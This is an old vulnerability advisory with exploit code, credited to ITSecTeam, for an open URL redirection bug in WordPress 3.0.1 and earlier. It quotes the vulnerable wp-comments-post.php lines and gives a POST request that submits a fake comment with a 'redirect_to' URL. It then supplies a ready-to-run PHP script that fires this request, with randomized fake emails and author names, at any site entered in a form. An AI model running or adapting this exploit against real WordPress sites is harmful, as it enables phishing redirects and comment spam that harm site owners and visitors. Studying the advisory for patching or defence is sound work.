#Title: WordPress (Version 3.0.1 And Prior) Url Redirection Bug
#Vendor: http://wordpress.org/download/
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability65.htm
#Thanks: Amin Shokohi(Pejvak),M3hr@n$,r3dm0v3,am!rkh@n Particular
Hookah(Dosib) :D
######################################################################
Poc : line 94-98 wordpress/wp-comments-post.php
$location = empty($_POST['redirect_to']) ? get_comment_link($comment_id) :
$_POST['redirect_to'] . '#comment-' . $comment_id;
		*Varible $location equal $_POST['redirect_to']*
$location = apply_filters('comment_post_redirect', $location, $comment);
		*Function Redirect Wordpress*
wp_redirect($location);
		*Redirect To Varible $location*
######################################################################
Poc 2 : Usage
This Bug Worked In Request Post
Post :
comment_post_ID=1 //Post Id If Is Wrong Buf Not Worked
email=emal@yahoo.com //Fake Email Address
author=pejipeji //Fake Author Name
comment=Hi //Fake Comment
redirect_to=http://www.itsecteam.com //Url Adddress For Redirect
######################################################################
*Note : if post_ID Wrong Bug Not Worked
######################################################################
#Bug : http://localhost/wordpress/wp-comments-post.php
######################################################################
Exploit For Test :
<?php
echo "<b><center>Wordpress Vulnerability Url Redirection
Test<br>ItSecTeam.com<br></b><form action=".$_SERVER['PHP_SELF']."
method=post>Url : <input type=text size=50 value=http://www. name=url>
<input type=submit Value='  Send Request  '></center></form>";

if($_POST['url']){
		$ch = curl_init($_POST['url']."/wp-comments-post.php");
        curl_setopt($ch, CURLOPT_POSTFIELDS,
"comment_post_ID=1&email=pejipeji".rand(1,9999)."@yahoo.com&author=pejipeji".rand(1,9999)."&comment=Hi".rand(1,9999)."&redirect_to=http://www.itsecteam.com");
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $response = curl_exec($ch);
		$info=null;
        $info =curl_getinfo($ch);
echo $info['url'];
		}
?>